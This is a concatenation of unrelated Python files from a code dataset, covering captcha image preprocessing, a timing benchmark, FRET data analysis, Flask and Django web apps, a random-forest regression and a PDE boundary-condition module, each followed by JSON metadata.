% (end_time - start_time))\n\ndef load_images(path):\n subpath_or_file = os.listdir(path)\n pic_name_list = [f for f in subpath_or_file if os.path.isfile(os.path.join(path,f))] #isfile()只能判断当前目录下./,所以需要加绝对路径\n img_vec = []\n for pic_name in pic_name_list:\n image = cv2.imread(os.path.join(path,pic_name))\n img_vec.append(image)\n\n return img_vec\n\ndef image_show(image,img_name='image'):\n cv2.namedWindow(img_name) \n cv2.imshow(img_name, image) \n cv2.waitKey (0) \n cv2.destroyAllWindows() \n\n#图片灰度化\ndef image_grayscale(image):\n img_gray = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)\n return img_gray\n\n#均值滤波\ndef mean_filter(image):\n img_filter = cv2.medianBlur(image,3)\n return img_filter\n\n#二值化\ndef image_binarization(image,threshold=128):\n img_height = image.shape[0]\n img_width = image.shape[1]\n\n for i in range(img_height):\n for j in range(img_width):\n if image[i,j]< threshold:\n image[i,j] = 0\n else:\n image[i,j] = 255\n return image\n\n#图像锐化\ndef image_sharp(image,flag1=0,flag2=0):\n img_height = image.shape[0]\n img_width = image.shape[1]\n\n img_sharp = np.zeros(image.shape,np.uint8)\n for i in range(img_height-1):\n for j in range(img_width-1):\n if flag2 == 0:\n x = abs(image[i,j+1]-image[i,j])\n y = abs(image[i+1,j]-image[i,j])\n else:\n x = abs(image[i+1,j+1]-image[i,j])\n y = abs(image[i+1,j]-image[i,j+1])\n if flag1 == 0:\n img_sharp[i,j] = max(x,y)\n else:\n img_sharp[i,j] = x+y\n return img_sharp \n\n#图像的开操作; 开操作 = 腐蚀->膨胀;\ndef image_open(image):\n ret, binary = cv2.threshold(image, 0, 255, cv2.THRESH_BINARY_INV | cv2.THRESH_OTSU) \n kernel=cv2.getStructuringElement(cv2.MORPH_RECT,(5,5)) \n #形态学操作 \n #第二个参数:要执行的形态学操作类型,这里是开操作 \n img_open =cv2.morphologyEx(binary,cv.MORPH_OPEN,kernel)\n\n return img_open\n\n#图像的闭操作;闭操作 = 膨胀->腐蚀;\ndef image_close(image): \n ret, binary = cv2.threshold(image, 0, 255, cv2.THRESH_BINARY_INV | cv2.THRESH_OTSU) \n kernel=cv2.getStructuringElement(cv2.MORPH_RECT,(1,1)) \n #形态学操作 \n #第二个参数:要执行的形态学操作类型,这里是开操作 \n img_close = cv2.morphologyEx(binary,cv2.MORPH_CLOSE,kernel) \n\n return img_close\n \n#对完整二维码图片垂直切割成单个字母\ndef image_vertical_segmentation(image,padding=4,blank=3):\n img_height = image.shape[0]\n img_width = image.shape[1]\n split_x = []\n img_split_vec = []\n x = 0\n while (True):\n if x >= img_width:\n break\n if np.sum(image[:,x]==0)>padding:\n x_start = x\n x_stride = 0\n while(True): \n x_stride += 1\n if x + x_stride == img_width:\n break\n if(np.sum(image[:,x+x_stride]==0)= img_height:\n break\n if np.sum(image[y,:]==0)>padding:\n y_start = y\n while(True):\n y_stride += 1\n y_end = img_height-y_stride\n if(np.sum(image[y_end,:]==0)>padding):\n break\n break\n y += 1\n\n index_start = y_start - blank \n index_end = y_end + blank\n img_single_ = image[index_start:index_end,:]\n\n return img_single_\n\n#去除噪声\ndef image_preprocessing(image):\n img_gray = image_grayscale(image)\n #img_binarization = image_binarization(img_gray,200)\n img_mean_filter = mean_filter(img_gray)\n #image_show(img_mean_filter)\n #img_close = image_close(img_mean_filter)\n #image_show(img_close,filename)\n img_binarization = image_binarization(img_mean_filter,220)\n #print(img_mean_filter[20:26,0:100])\n #image_show(img_binarization)\n #image_imaxsharp = image_sharp(img_binarization)\n #image_iaddsharp = image_sharp(img_binarization,1)\n #image_show(image_iaddsharp,filename)\n #iAddSharp = Sharp(image,1)\n #iRMaxSharp = Sharp(image,0,1)\n #iRAddSharp = Sharp(image,1,1)\n return img_binarization\n\ndef image_save(dirpath,filename,image):\n if not 
os.path.exists(dirpath):\n os.makedirs(dirpath)\n save_dirpath_filename = os.path.join(dirpath,filename)\n cv2.imwrite(save_dirpath_filename+'.bmp',image)\n\n return True\n\ndef image_expansion(image):\n img_height = image.shape[0]\n img_width = image.shape[1]\n \n left_exp = int((img_height - img_width) / 2)\n right_exp = img_height - img_width - left_exp\n\n image_expansion = cv2.copyMakeBorder(image,\n 0, 0, left_exp, right_exp,\n cv2.BORDER_CONSTANT,\n value = [255, 255, 255,255])\n return image_expansion\n\ndef main():\n dirpath = 'pic_temp'\n save_dirpath = 'split_pic_temp'\n img_vec = load_images(dirpath)\n\n img_single_vec = []\n for image_ in img_vec[20:25]:\n img_dropnoises = image_preprocessing(image_)\n img_split_vec = image_vertical_segmentation(img_dropnoises)\n for img_split_ in img_split_vec:\n image_show(img_split_)\n if img_split_.shape[0] >= img_split_.shape[1]: #判断图片是否垂直分割出单个字母\n img_expansion = image_expansion(img_split_)\n print(img_expansion.shape)\n image_show(img_expansion)\n #filename = str(uuid.uuid1())\n #image_save(save_dirpath,filename,img_split_)\n #img_single_ = image_horizontal_segmentation(img_split_)\n #image_show(img_single_)\n #img_single_vec.append(img_single_)\n \n #for img_single_ in img_single_vec:\n # filename = str(uuid.uuid1())\n # image_save(save_dirpath,filename,img_single_)\n\n print('图片切割并保存完成!')\n\nif __name__ == '__main__':\n main()\n #asysnc_download()","sub_path":"CaptchaRecognize/ImagePreprocessing.py","file_name":"ImagePreprocessing.py","file_ext":"py","file_size_in_byte":8300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"222019503","text":"# Question -14\n\n\"\"\"\nWrite a program that accepts a sentence and calculate the number of upper case letters and lower case letters.\n\n! Suppose the following input is supplied to the program:\n\n? Hello world!\n\n! Then, the output should be:\n\n? UPPER CASE 1\n? 
LOWER CASE 9\n\n\"\"\"\n\nword = input(\"Enter word\")\nupper,lower = 0,0\n\nfor i in word:\n if 'a' <=i and i <= 'z':\n lower += 1\n if 'A' <=i and i <= 'Z':\n upper +=1\n \nprint(f\"Upper Case {upper}\\n Lower Case {lower}\\n\")","sub_path":"Day4/program14.py","file_name":"program14.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"343857941","text":"import csv\nimport os\nimport threading\nimport time\nfrom functools import wraps\n\nlock = threading.Lock() ## i need this for printing things in the correct order on the standard output\n\n\ndef _timeFunctionCalls(rounds, function, *args, **kwargs):\n results = dict()\n for i in range(rounds):\n run = 0\n time1 = time.perf_counter()\n function(*args, **kwargs)\n run = time.perf_counter() - time1\n results[i+1] = run\n return results\n\n\ndef benchmark(warmups=0, iter=1, verbose=False, csv_file=None):\n def decorator(func):\n @wraps(func)\n def wrapper(*args, **kwargs):\n result = func(*args,**kwargs) ##store the function result for return\n warm = dict()\n if warmups != 0:\n warm = _timeFunctionCalls(warmups, func, *args, **kwargs)\n invoke = _timeFunctionCalls(iter, func, *args, **kwargs)\n # without the lock things were overlapping on the screen\n lock.acquire()\n if verbose:\n \n print(\"{:<8} {:<15} {:<10}\".format(\n 'run num', 'is warmup', 'time'))\n \n for k, v in warm.items():\n print(\"{:<8} {:<15} {:<10}\".format(k, 'yes', v))\n\n for k, v in invoke.items():\n print(\"{:<8} {:<15} {:<10}\".format(k+warmups, 'no', v))\n\n avg = sum(invoke.values()) / iter\n variance = sum((v - avg) ** 2 for v in invoke.values()) / iter\n print(\"\\n{:<8} {:<15}\\\n \\n{:<8} {:<15}\\n\"\\\n .format('average time', avg,\\\n 'variance',variance))\n \n lock.release()\n if csv_file:\n with open(csv_file, \"a\") as f:\n writer = csv.writer(f)\n \n\n writer.writerow(['THREAD:',threading.current_thread().getName(),''])\n writer.writerow(['run num', 'is warmup', 'timing'])\n for k, v in warm.items():\n writer.writerow([k, 'yes', v])\n for k, v in invoke.items():\n writer.writerow([k+warmups, 'no', v])\n \n \n writer.writerow(['average', avg,''])\n writer.writerow(['variance', variance,''])\n writer.writerow(['','',''])\n return result\n return wrapper\n return decorator\n\n\ndef _rec_fibonacci(n):\n if n == 0:\n return 0\n elif n == 1:\n return 1\n else:\n return _rec_fibonacci(n-1) + _rec_fibonacci(n-2)\n\ndef fibonacci(n=0):\n #using an helper function so the decorator doesn't execute its extra code for each recursive call\n return _rec_fibonacci(n)\n\n\ndef test():\n files = [\"f_1_16.csv\",\"f_2_8.csv\",\"f_4_4.csv\",\"f_8_2.csv\"]\n #clear the existing files\n [os.remove(f) for f in files if os.path.isfile(f)]\n threads = list()\n for i in range(4):\n threads.clear()\n it = 2**i\n print(\"\\n\\nNUMBER OF THREADS:{}\\n\\n\".format(it))\n fib = benchmark(iter=int(16/it),verbose=True,warmups=3, csv_file=files[i])\n fib = fib(fibonacci)\n [threads.append(threading.Thread(target=fib,args=(10,),name='{}-{}'.format(it,j+1))) for j in range(it)]\n [thread.start() for thread in threads]\n [thread.join() for thread in threads]\n\n\"\"\"\nBy executing the test function and comparing the results we can see\nthat increasing the number of threads does not bring any\nsignificant improvement in the run time. 
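One quick check: the per-run\ntimings appended to f_1_16.csv through f_8_2.csv stay in the same range no\nmatter how many threads are used. By contrast, a process pool does scale for\nthis workload, because every worker owns a separate interpreter; an\nillustrative (not part of the assignment) variant would be:\n\n    from multiprocessing import Pool\n    with Pool(4) as pool:\n        pool.map(fibonacci, [10] * 16)\n\nwhereas the threads cannot speed it up.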
\n\nThis is caused by the Global Interpreter Lock.\nAs we know only one thread at a time is allowed to run python bytecode and this siginificantly impact on the effects\nthat multithreading usually has.\n\nThe fibonacci function used as a test is CPU bound, so the GIL is not released until completion.\n\n\"\"\"\n\n\nif __name__ == \"__main__\":\n test()\n","sub_path":"Assignment2/Python/benchmark.py","file_name":"benchmark.py","file_ext":"py","file_size_in_byte":3962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"163690004","text":"# use numpy for array operations\nimport numpy as np\n# import sys for file and path stuff\nimport sys\nsys.path.append('../Utilities')\n# import the util file.\nimport Utilities as util\n# import the plotting utility file\nimport PlotUtilities as plotUtil\n# import cycling..\nfrom itertools import cycle\nimport matplotlib.pyplot as plt\nimport scipy.cluster.vq as cluster \nfrom scipy import interpolate\n\ndef convertTimeToIndex(times,frameRate=0.1):\n return np.round(times / frameRate)\n\ndef getMinimumTime(values,times,value,lessThanBool=False):\n minimumTimes = -1 * np.ones((len(values),1))\n # the times to interpolate the times. XXX probably \n # want to make this a constant of some kind.\n numPoints = 1000\n # get the bounds for interpolation\n # get the interpolation grid\n for i,listV in enumerate(values):\n timeRaw = times[i]\n timeGrid = np.linspace(0,np.max(timeRaw),numPoints)\n listTmp = np.interp(timeGrid,timeRaw,listV)\n # need to make sure we start below the lower bound\n # or send above the upper bound\n lessThan =(listTmp <= value)\n greaterThan = (listTmp >= value) \n if (lessThanBool):\n toTest = lessThan\n else:\n toTest= greaterThan\n # if our condition isn't true for any time,\n # ignore the protein (ie: it wasn't ever less than\n # the lower bound or greater than the upper bound)\n if not np.any(toTest):\n continue\n # look for the lowest squared difference from the desired value.\n diffArr = (listTmp-value)**2\n firstIndex = np.argmin(diffArr)\n # get the best interpolated time.\n bestTime = timeGrid[firstIndex]\n minimumTimes[i] = bestTime\n return minimumTimes\n\ndef getDifferentialTime(valuesBefore,valuesAfter):\n # returns when we have a well-defined unfolding...\n numVals = len(valuesBefore)\n indices= []\n diffTime = []\n for i in range(numVals):\n first = valuesBefore[i]\n second = valuesAfter[i]\n if (first < 0 or second < 0):\n continue\n if (first >= second):\n continue\n # POST: non negative, values 'match'\n indices.append(i)\n # append the proper diff time\n diffTime.append(second-first)\n return diffTime,indices\n\ndef getDistances(goodFRET,goodTimes):\n # goodFRET is defined by the API as the FRET ratio from GetTraces.\n # This essentially means it has been corrected for objects which have\n # ill-defined trajectories or difusion coeffs\n # RETURNS: the 'good' distances and time found, as well as the indexing array\n distances = []\n times = []\n indices = []\n nodeIndices = []\n count = 0\n for t,FRET in zip(goodTimes,goodFRET):\n # this is the trace, FRET, and diff for each protein\n # force some reason we have negative data? 
(Figure this out)\n # XXX make the ugly where thing into a find.\n # XXX figure out how to fix this..\n goodIndices = np.where(FRET > 0)[0]\n if ((len(goodIndices) == 0) or \n (min(goodIndices) == max(goodIndices))):\n indices.append([])\n continue\n betterFRET = FRET[goodIndices]\n betterTime = t[goodIndices]\n betterTime -= np.min(betterTime)\n distanceValues = betterFRET**(1/6)\n distances.append(np.array(distanceValues))\n indices.append(np.array(goodIndices))\n times.append(np.array(betterTime))\n nodeIndices.append(count)\n count += 1\n return np.array(distances),np.array(times),np.array(indices),np.array(nodeIndices)\n\n\ndef GetPhysicsMain(goodTimes,goodFRET,goodDiff):\n source = 'Step2::GetPhysics'\n util.ReportMessage(\"Starting\",source)\n colors = ['r','g','b','k','m','c','y','0.33','0.66']\n colorCycle = cycle(colors)\n count = 0\n fig = plotUtil.pFigure()\n # XXXfill all these in! based on video size\n frameRate = 0.1\n maxNumTimes = 30*10\n distances,times,definedDistancesIdx,nodeIdx =getDistances(goodFRET,goodTimes)\n # get just the 'nodes' with valid valued.\n # flatten the distances to get a notion of the 'all time'\n # distance information. We can use this and kmeans to find a 'folded\n # and unfolded sttae\n flattenDistances = np.concatenate(distances)\n # use two clusters; folded and unfolded\n numClusters = 2\n # lots of iterations (this number seems to work well; the 'smooth'\n # running time / convergence (?) of kmeans is polynomial\n # http://en.wikipedia.org/wiki/K-means_clustering\n numIters = int(1e3)\n clusters,ignore = cluster.kmeans(flattenDistances,numClusters,iter=numIters)\n # the clusters give us the 'folded' and 'unfolded' groups. between those, we have\n # a fairly undefined state.\n folded = min(clusters)\n unfolded = max(clusters)\n clusters = [unfolded,folded]\n \n folded = getMinimumTime(distances,times,folded,False)\n unfolded = getMinimumTime(distances,times,unfolded,True)\n diffTime, definedUnfoldingIdx = getDifferentialTime(folded,unfolded)\n\n goodDiff = util.takeSubset(goodDiff,\n [nodeIdx,definedUnfoldingIdx])\n\n plt.xscale('log', nonposy='clip')\n plt.xlabel('Time since protein (seconds)')\n plt.ylabel('FRET d distance (arb)')\n fig = plotUtil.pFigure()\n numPlots = 2\n plotCount = 1\n fretLabel = 'FRET d Distance (arb)'\n ax = plt.subplot(numPlots,1,plotCount)\n plotUtil.histogramPlot(ax,fretLabel,'# Proteins',\n 'FRET Distance histogram',flattenDistances,\n len(flattenDistances)/100,True,True)\n # plot guiding lines for the two clusters we found\n normalClusters = plotUtil.normalizeTo(flattenDistances,clusters)\n plt.axvline(normalClusters[0])\n plt.axvline(normalClusters[1])\n \n plotCount += 1\n ax = plt.subplot(numPlots,1,plotCount)\n plotUtil.histogramPlot(ax,'Unfolding time distribution','# Proteins',\n 'Unfolding time (seconds) ',diffTime,\n len(diffTime)/100,True,True)\n\n\n plotUtil.saveFigure(fig,'tmp2')\n # return the good unfolding times and differential coefficients\n return diffTime,goodDiff\n\n \n","sub_path":"Stage2_TracesToPhyscs/GetPhysics.py","file_name":"GetPhysics.py","file_ext":"py","file_size_in_byte":6224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"446890622","text":"from flask import Flask, request, render_template, redirect, flash, session\nfrom flask_debugtoolbar import DebugToolbarExtension\nfrom models import *\nfrom forms import AddPet, EditPet\n\napp = Flask(__name__)\n\napp.config['SQLALCHEMY_DATABASE_URI'] = 
'postgresql:///adopt'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.config['SQLALCHEMY_ECHO'] = True\napp.config['SECRET_KEY'] = 'BABBaada'\napp.config['DEBUG_TB_INTERCEPT_REDIRECTS'] = False\ndebug = DebugToolbarExtension(app)\n\nconnect_db(app)\n\n\n@app.route('/')\ndef home_page():\n    pets = Pet.query.all()\n    return render_template('home.html', pets=pets)\n\n\n@app.route('/add', methods=['GET', 'POST'])\ndef add_pet():\n    form = AddPet()\n\n    if form.validate_on_submit():\n        name = form.name.data\n        species = form.species.data\n        photo_url = form.photo_url.data\n        age = form.age.data\n        notes = form.notes.data\n\n        pet = Pet(name=name, species=species,\n                  photo_url=photo_url, age=age, notes=notes)\n        db.session.add(pet)\n        db.session.commit()\n        flash(f'created new pet: name of {name}, species is {species}')\n        return redirect('/')\n    else:\n        return render_template('add_pet_form.html', form=form)\n\n\n@app.route('/<int:id>', methods=['GET', 'POST'])\ndef pet_page(id):\n    pet = Pet.query.get_or_404(id)\n    form = EditPet(obj=pet)\n\n    if form.validate_on_submit():\n\n        pet.photo_url = form.photo_url.data\n        pet.notes = form.notes.data\n        pet.available = form.available.data\n        db.session.commit()\n        return redirect('/')\n    else:\n\n        return render_template('pet_display.html', form=form, pet=pet)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"644173665","text":"\nimport os\nimport time\nimport mimetypes\n\nfrom pathlib import Path\nfrom django.apps import config\nfrom django.core.files import uploadedfile, File\nfrom django.http.response import HttpResponse\nfrom django.shortcuts import render, redirect\nfrom django.views.generic import TemplateView, ListView, CreateView\nfrom django.core.files.storage import FileSystemStorage\nfrom django.urls import conf, reverse_lazy\nfrom django.views.generic.edit import FormView\nfrom django.views.static import serve\n\nfrom .models import UploadExtras\nfrom .forms import ConfigUpload, ExtrasUpload\nfrom .generator.generation import dag_generation_v1\nfrom .generator.file_count import file_count\n\n\n\n\n\nclass Home(TemplateView):\n    template_name = 'home.html'\n\n\ndef block_sort(yaml_config):\n    file_list=file_count(yaml_config)\n    file_list=file_list.task_master()\n    return file_list\n\n\ndef upload(request):\n    if request.method == 'POST':\n        config_path = Path(__file__).parent\n        config_path = Path( config_path , './generator/dag_files/')\n        file_list=os.listdir(config_path)\n        \n        for file in file_list:\n            if file != \"__init__.py\" and file != \"__pycache__\":\n                file_path = Path(__file__).parent\n                file_path = Path( file_path , './generator/dag_files/{}'.format(file))\n                os.remove(file_path)\n            else:\n                pass\n        extras_path = Path(__file__).parent\n        extras_path = Path( extras_path , './generator/resultFile/')\n        dag_list=os.listdir(extras_path)\n        \n        for file in dag_list:\n            if file != \"__init__.py\" and file != \"__pycache__\":\n                extras_path = Path(__file__).parent\n                extras_path = Path( extras_path , './generator/resultFile/{}'.format(file))\n                os.remove(extras_path)\n            else:\n                pass\n\n        form = ConfigUpload(request.POST, request.FILES)\n        yaml_config_name, yaml_config = str(request.FILES['configs']), request.FILES['configs']\n        if \"(application/x-yaml)\" in str(request.FILES):\n            if form.is_valid():\n                path = Path(__file__).parent\n                path = Path( path , './generator/dag_files/{}'.format(yaml_config_name))\n                with open(path, 'wb+') as destination:\n                    
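# UploadedFile.chunks() streams the upload, so even a large config file\n                    # is written without ever being held fully in memory.\n                    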
for chunk in yaml_config.chunks():\n destination.write(chunk)\n request.session[\"file_list\"]=block_sort(yaml_config)\n request.session[\"yaml_config_name\"]=yaml_config_name\n context = {'msg' : 'File successfully uploaded'}\n return redirect('/upload_extras/')\n\n \n else:\n form = ConfigUpload()\n return render(request, 'upload.html', {'form':form})\n\n\ndef extra_uploads(request):\n if request.method == 'POST':\n form = ExtrasUpload(request.POST, request.FILES)\n files = request.FILES.getlist('files')\n if form.is_valid():\n\n file_list = request.session.get(\"file_list\", \"[]\")\n upload_list=[]\n for f in files:\n upload_list.append(f.name)\n path = Path(__file__).parent\n path = Path( path , './generator/dag_files/{}'.format(f.name))\n with open(path, 'wb+') as destination:\n for chunk in f.chunks():\n destination.write(chunk)\n\n path = Path(__file__).parent\n path = Path( path , \"./generator/dag_files/\")\n uploaded_files=os.listdir(path)\n\n for file in file_list:\n if file in upload_list or file in uploaded_files:\n context = {'msg' : 'File successfully uploaded'}\n pass\n else:\n context = {'msg' : 'Based on uploaded config you are missing file {}'.format(file)}\n return render(request, 'upload_extras.html', context)\n break\n if context == {'msg' : 'File successfully uploaded'}:\n yaml_config = request.session.get(\"yaml_config_name\", \"\")\n dagger=dag_generation_v1(yaml_config)\n dagger.task_master()\n\n return redirect('/result_file/')\n else:\n form = ExtrasUpload()\n return render(request, 'upload_extras.html', {'form':form}) \n\ndef viewer(request):\n path = Path(__file__).parent\n path = Path( path , \"./generator/resultFile/\")\n dag_list = os.listdir(path)\n if len(dag_list) > 0:\n path = Path( path , \"./{}\".format(dag_list[0]))\n f = open(path)\n file_contents = f.read()\n f.close()\n args = {'dag': file_contents}\n\n return render(request, \"dag_render.html\", args)\n else:\n context = {'msg' : 'Proper files have not been uploaded, please reupload your docs '}\n return render(request, 'home.html', context)\n\n\ndef download_dag(request):\n if request.method=='GET':\n path = Path(__file__).parent\n path = Path( path , \"./generator/resultFile/\")\n dag_list = os.listdir(path)\n if len(dag_list) > 0:\n print(\"yes\")\n dag_name=dag_list[0]\n path = Path( path , \"./{}\".format(str(dag_name)))\n f = open(path, 'rb')\n mime_type, _ = mimetypes.guess_type(path)\n response = HttpResponse(f, content_type=mime_type)\n response['Content-Disposition'] = 'attachment; filename=%s' % str(dag_name)\n f.close()\n return response\n else:\n context = {'msg' : 'Proper files have not been uploaded, please reupload your docs '}\n return render(request, 'home.html', context)\n\ndef config_remove(yaml_config):\n path = Path(__file__).parent\n path = Path( path , './generator/dag_files/{}'.format(yaml_config))\n time.sleep(15)\n os.remove(path)\n \n ","sub_path":"fileparse/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"91917687","text":"#!/bin/python3\n\nimport argparse\n\nfrom commandswitcher import CommandSwitcher\n\nif __name__ == '__main__':\n p = argparse.ArgumentParser(description='Processing messages coming from TELEGRAM-CLI as arguments')\n p.add_argument('msg', metavar='msg', type=str, help='received message')\n args = p.parse_args()\n\n if args.msg == None:\n print(\"ERROR: Could not get message!\")\n exit()\n\n cmd_switcher = 
CommandSwitcher(args.msg)\n cmd_switcher.execute()\n\n\n\n\n\n\n","sub_path":"listener.py","file_name":"listener.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"300626105","text":"from sklearn.metrics import mean_squared_error\nfrom sklearn.metrics import mean_absolute_error\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import GridSearchCV\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport numpy as np\nimport pandas as pd\n\n\n# RFR\ndf = pd.read_excel('C:/Users/Asus/PycharmProjects/CSE498R/compressive_strength.xlsx')\ndata = df.iloc[:, 0:8]\nX = data.iloc[:, 1:].values\ny = data.iloc[:, :1].values\ny = np.array(y).reshape(-1, 1)\nsc_X = StandardScaler()\nsc_y = StandardScaler()\nX = sc_X.fit_transform(X.reshape(-1, 7))\ny = sc_y.fit_transform(y.reshape(-1, 1))\nX_trn, X_tst, y_trn, y_tst = train_test_split(X, y, test_size=0.3)\n\nfrom sklearn.ensemble import RandomForestRegressor\nregressor = RandomForestRegressor(n_estimators=100, criterion='mse', bootstrap=True, max_depth=10, random_state=42)\nregressor.fit(X_trn.reshape(-1, 7), y_trn.reshape(-1, 1).ravel())\ny_predd = regressor.predict(X_tst)\ny_predds = sc_y.inverse_transform(y_predd)\n\n\nprint(\"MSE\")\nprint(mean_squared_error(y_tst, y_predd))\nprint(\"RMSE\")\nprint(mean_squared_error(y_tst, y_predd, squared=False))\nprint(\"MAE\")\nprint(mean_absolute_error(y_tst, y_predd))\nshow = pd.DataFrame({'Real Values': sc_y.inverse_transform(y_tst.reshape(-1)), 'Predicted Values': y_predd})\nprint(show)\n\n\nplt.scatter(y_tst, y_predd)\nplt.plot([y_tst.min(), y_tst.max()], [y_tst.min(), y_tst.max()], 'k--', 'lw=2')\nplt.title('Random Forest Regression')\nplt.xlabel('Predicted Values')\nplt.ylabel('Actual Values')\nplt.show()\n\nsns.displot(y_predd, label=\"Predicted\")\nsns.displot(y_tst, label=\"Real\")\nplt.show()\n\n\nparam_grid = {'n_estimators': [1, 2, 3, 4, 5, 6, 7, 8, 9, 10],\n # 'max_features': ['auto', 'sqrt', 'log2'],\n 'max_depth': [10, 20, 30, 40, 50, 60, 70, 80, 90, 100, None],\n 'criterion': ['mse'],\n 'bootstrap': [True, False]}\noptimal_params = GridSearchCV(RandomForestRegressor(),\n param_grid,\n cv=3,\n verbose=0,\n n_jobs=-1)\n\noptimal_params.fit(X_trn, y_trn.ravel())\nprint(optimal_params.best_params_)\n","sub_path":"compressive/compressive3.py","file_name":"compressive3.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"258443206","text":"r\"\"\"\n.. codeauthor:: David Zwicker \n\nThis module contains classes for handling a single boundary of a non-periodic\naxis. 
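A condition can be supplied as a string identifier (one of the `names`\nlisted on each class), as a dictionary of parameters, or as an instance of\none of these classes; see `BoundaryData` below. 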
Since an axis has two boundaries, we simply distinguish them by a boolean\nflag `upper`, which is True for the side of the axis with the larger coordinate.\n\nThe module currently supports different boundary conditions:\n\n* :class:`~pde.grids.boundaries.local.DirichletBC`:\n Imposing the value of a field at the boundary\n* :class:`~pde.grids.boundaries.local.NeumannBC`:\n Imposing the derivative of a field in the outward normal direction at the\n boundary\n* :class:`~pde.grids.boundaries.local.MixedBC`:\n Imposing the derivative of a field in the outward normal direction\n proportional to its value at the boundary\n* :class:`~pde.grids.boundaries.local.CurvatureBC`:\n Imposing the second derivative (curvature) of a field at the boundary\n* :class:`~pde.grids.boundaries.local.ExtrapolateBC`:\n Extrapolating boundary points linearly from the two points closest to the\n boundary\n\nDerivatives are given in the direction of the outward normal vector, such that\npositive derivatives correspond to a function that increases across the\nboundary, which corresponds to an inwards flux. Conversely, negative\nderivatives are associated with effluxes.\n\"\"\"\n\nfrom abc import ABCMeta, abstractmethod\nimport numbers\nfrom typing import Any, Union, Tuple, Dict, Sequence, Optional, Callable, List\n\nimport numpy as np\n\nfrom ..base import GridBase\nfrom ...tools.numba import jit\nfrom ...tools.expressions import ScalarExpression\n\n\n\nVectorType = Optional[Sequence[float]]\nTensorType = Optional[Sequence[Sequence[float]]]\nBoundaryData = Union[Dict, str, \"BCBase\"]\n\n\n\nclass DomainError(ValueError):\n \"\"\" exception indicating that a point lies outside the domain \"\"\"\n pass\n\n\n\nclass PeriodicityError(RuntimeError):\n \"\"\" exception indicating that the grid periodicity is inconsistent \"\"\"\n pass\n\n\n\ndef _get_arr_1d(arr, idx: Tuple[int, ...], axis: int) \\\n -> Tuple[Any, int, Tuple[int, ...]]:\n \"\"\" extract the 1d array along axis at point idx\n \n Args:\n arr (:class:`numpy.ndarray`): The full data array\n idx (tuple): An index into the data array\n axis (int): The axis along which the 1d array will be extracted\n \n Returns:\n tuple: a tuple (arr_1d, i, bc_i), where `arr_1d` is the 1d array, `i` is\n the index `i` into this array marking the current point and `bc_i` are\n the remaining components of `idx`, which locate the point in the\n orthogonal directions. Consequently, `i = idx[axis]` and\n `arr[..., idx] == arr_1d[..., i]`.\n \"\"\"\n dim = len(idx)\n # extract the correct indices\n if dim == 1:\n i = idx[0]\n bc_idx: Tuple[int, ...] = tuple()\n arr_1d = arr\n \n elif dim == 2:\n if axis == 0:\n i, y = idx\n bc_idx = (y,)\n arr_1d = arr[..., :, y]\n elif axis == 1:\n x, i = idx\n bc_idx = (x,)\n arr_1d = arr[..., x, :]\n \n elif dim == 3:\n if axis == 0:\n i, y, z = idx\n bc_idx = (y, z)\n arr_1d = arr[..., :, y, z]\n elif axis == 1:\n x, i, z = idx\n bc_idx = (x, z)\n arr_1d = arr[..., x, :, z]\n elif axis == 2:\n x, y, i = idx\n bc_idx = (x, y)\n arr_1d = arr[..., x, y, :]\n \n else:\n raise NotImplementedError\n \n return arr_1d, i, bc_idx\n\n\n\ndef _make_get_arr_1d(dim: int, axis: int) -> Callable:\n \"\"\" create function that extracts a 1d array at a given position\n \n Args:\n dim (int): The dimension of the space, i.e., the number of axes in the\n supplied data array\n axis (int): The axis that is returned as the 1d array\n \n Returns:\n function: A numba compiled function that takes the full array `arr` and\n an index `idx` (a tuple of `dim` integers) specifying the point where\n the 1d array is extracted. The function returns a tuple (arr_1d, i, bc_i),\n where `arr_1d` is the 1d array, `i` is the index `i` into this array\n marking the current point and `bc_i` are the remaining components of\n `idx`, which locate the point in the orthogonal directions.\n Consequently, `i = idx[axis]` and `arr[..., idx] == arr_1d[..., i]`.\n \"\"\"\n assert 0 <= axis < dim\n \n @jit\n def get_arr_1d(arr, idx: Tuple[int, ...]) \\\n -> Tuple[Any, int, Tuple[int, ...]]:\n \"\"\" extract the 1d array along axis at point idx \"\"\"\n # extract the correct indices\n if dim == 1:\n i = idx[0]\n bc_idx: Tuple[int, ...] = tuple()\n arr_1d = arr\n \n elif dim == 2:\n if axis == 0:\n i, y = idx\n bc_idx = (y,)\n arr_1d = arr[..., :, y]\n elif axis == 1:\n x, i = idx\n bc_idx = (x,)\n arr_1d = arr[..., x, :]\n \n elif dim == 3:\n if axis == 0:\n i, y, z = idx\n bc_idx = (y, z)\n arr_1d = arr[..., :, y, z]\n elif axis == 1:\n x, i, z = idx\n bc_idx = (x, z)\n arr_1d = arr[..., x, :, z]\n elif axis == 2:\n x, y, i = idx\n bc_idx = (x, y)\n arr_1d = arr[..., x, y, :]\n \n else:\n raise NotImplementedError\n \n return arr_1d, i, bc_idx\n \n return get_arr_1d # type: ignore\n\n\n\nclass BCBase(metaclass=ABCMeta):\n \"\"\" represents a single boundary in a BoundaryPair instance \"\"\"\n \n names: List[str] # identifiers for the given boundary\n homogeneous: bool # whether the boundary condition is independent of space\n value: Any # the actual value of the boundary condition\n\n _subclasses: Dict[str, Any] = {} # all classes inheriting from this\n _conditions: Dict[str, Any] = {}\n 